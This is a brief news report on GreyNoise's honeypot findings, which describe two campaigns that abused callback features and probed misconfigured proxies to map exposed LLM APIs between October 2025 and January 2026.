- GreyNoise logged 91,000 attack sessions against exposed AI systems between Oct 2025 and Jan 2026
- Campaigns included tricking servers into “phoning home” and mass probing to map AI models
- Malicious actors targeted misconfigured proxies, testing OpenAI, Gemini, and other LLM APIs at scale
Hackers are exploiting misconfigured proxies to breach underlying Large Language Model (LLM) services, according to expert warnings.
Researchers at GreyNoise set up a fake, exposed AI system to observe interactions.
From October 2025 to January 2026, they recorded over 91,000 attack sessions, revealing two distinct attack campaigns.
A Systematic Approach
In the first campaign, a threat actor attempted to trick AI servers into connecting to a server they controlled. They exploited features like model downloads or webhooks, forcing the server to “phone home” without the owner's knowledge. The attackers monitored callbacks to confirm vulnerabilities in the underlying system.
The second campaign involved two IP addresses bombarding exposed AI endpoints tens of thousands of times. Their goal was not immediate access but to map reachable AI models and their configurations. They posed simple questions like “How many states are there in the US” to identify the AI model in use without raising alarms.
They systematically tested OpenAI-style APIs, Google Gemini formats, and various major model families, searching for proxies or gateways that inadvertently expose paid or internal AI access.
GreyNoise aimed to confirm that this was not the work of a hobbyist or cybersecurity researcher. The infrastructure used in the second campaign had a documented history of real-world vulnerability exploitation, and the campaign peaked during the Christmas break, indicating malicious intent.
“OAST callbacks are standard vulnerability research techniques. However, the scale and timing suggest grey-hat operations pushing boundaries,” GreyNoise noted.
Moreover, the same servers had previously been observed scanning for hundreds of CVEs.
Via BleepingComputer




